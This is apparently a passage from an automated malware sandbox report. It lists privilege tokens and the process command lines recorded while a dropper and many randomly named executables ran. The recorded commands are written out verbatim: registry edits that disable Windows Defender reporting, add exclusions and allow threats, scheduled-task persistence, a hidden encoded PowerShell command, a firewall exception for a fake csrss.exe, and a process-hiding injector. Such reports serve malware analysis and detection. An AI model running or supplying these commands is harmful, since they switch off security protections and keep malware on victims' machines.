| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe
"C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe"
C:\Users\Admin\Documents\GuardFox\LCpil3pW_l7ri4gXpRd7f0AQ.exe
"C:\Users\Admin\Documents\GuardFox\LCpil3pW_l7ri4gXpRd7f0AQ.exe"
C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe
"C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe"
C:\Users\Admin\Documents\GuardFox\w6rxdZKVGKZ4S99sMhSfXG4z.exe
"C:\Users\Admin\Documents\GuardFox\w6rxdZKVGKZ4S99sMhSfXG4z.exe"
C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe
"C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe"
C:\Users\Admin\Documents\GuardFox\FTX9TSuWx9FxH3XuanhJX4zO.exe
"C:\Users\Admin\Documents\GuardFox\FTX9TSuWx9FxH3XuanhJX4zO.exe"
C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe
"C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe" -i
C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe
"C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe" -s
C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe
.\Install.exe /iFFhdidlQI "525403" /S
C:\Users\Admin\AppData\Local\Temp\7zS11BE.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Documents\GuardFox\jfuVd2Wxxnz6tzydAf9H8i_Y.exe
"C:\Users\Admin\Documents\GuardFox\jfuVd2Wxxnz6tzydAf9H8i_Y.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5260 -s 340
C:\Users\Admin\Documents\GuardFox\SBv9uOfXRyyWp_0lKyUFY2zJ.exe
"C:\Users\Admin\Documents\GuardFox\SBv9uOfXRyyWp_0lKyUFY2zJ.exe"
C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe
"C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe"
C:\Users\Admin\AppData\Local\Temp\is-S0TH8.tmp\evl5AhAqx92wdfRi532WmaQN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S0TH8.tmp\evl5AhAqx92wdfRi532WmaQN.tmp" /SL5="$130200,4078676,54272,C:\Users\Admin\Documents\GuardFox\evl5AhAqx92wdfRi532WmaQN.exe"
C:\Users\Admin\Documents\GuardFox\LghhhG5dYtl5hoIKD95UlVUg.exe
"C:\Users\Admin\Documents\GuardFox\LghhhG5dYtl5hoIKD95UlVUg.exe"
C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe
"C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5260 -ip 5260
C:\Users\Admin\Documents\GuardFox\vGrIU7ib1YOS2PYSmzDAoF5v.exe
"C:\Users\Admin\Documents\GuardFox\vGrIU7ib1YOS2PYSmzDAoF5v.exe"
C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe
"C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe"
C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe
"C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe"
C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe
"C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe"
C:\Users\Admin\Documents\GuardFox\evl5AhAqx92wdfRi532WmaQN.exe
"C:\Users\Admin\Documents\GuardFox\evl5AhAqx92wdfRi532WmaQN.exe"
C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe
"C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe"
C:\Users\Admin\Documents\GuardFox\e1lkxrydipIJfmBIkHJEKZuB.exe
"C:\Users\Admin\Documents\GuardFox\e1lkxrydipIJfmBIkHJEKZuB.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\60fd73a9-b566-4ebe-bf13-7efa1ba8c839" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe
"C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe
"C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5204 -ip 5204
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 568
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8b4cb9758,0x7ff8b4cb9768,0x7ff8b4cb9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXZzXSySt" /SC once /ST 10:21:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gXZzXSySt"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1952 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1740 -ip 1740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 2228
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe
"C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe"
C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe
"C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 956 -ip 956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 2164
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gXZzXSySt"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "beMXFFiCiqlBKkvOrW" /SC once /ST 11:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\hRDMMfa.exe\" Fm /zesite_idOIT 525403 /S" /V1 /F
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\hRDMMfa.exe
C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\hRDMMfa.exe Fm /zesite_idOIT 525403 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
